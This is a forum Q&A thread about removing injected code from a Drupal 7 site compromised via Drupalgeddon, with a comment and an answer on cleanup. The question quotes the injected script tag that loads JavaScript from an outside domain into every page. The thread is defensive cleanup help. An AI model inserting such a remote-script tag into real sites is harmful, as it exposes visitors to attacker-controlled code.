# How can I manually clean Drupalgeddon malware?

Tags: drupal, drupal-7, malware

In one of my elder Drupal 7 installations I found this js reference in my pages source code.

```
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>
```

According to my google search this could be caused by drupalgeddon malware. I have read some hints how to clean the system, but most of them recommend to restore the server from a previous backup. However, I do not want to loose current comments and would like to make a manual cleanup.

Where and how is this script added? I thought it might be included with drupal blocks. But when I disabled all blocks the script remains.

I think it must be somewhere in the drupal bootstrap procedure. Any ideas where to start and in which file (php?) additional drupal.js is added ?

Comment: This is really difficult to answer from afar. As there is no singular Drupalgeddon malware. It can be everything. Cryptominer, Spam catapult, phising etc. The only nearly bulletproof option you have is to rebuild your page from scratch with an absolutely fresh database. But this time don't forget to update Drupal as soon as security updates become available :)

Answer (score 0):

In my case (drupal 7) the hack was inserted in the html source of all blocks with only an image. About 10 instances in my case. I deleted them by editing the content of the blocks in the user interface in 'source-mode'.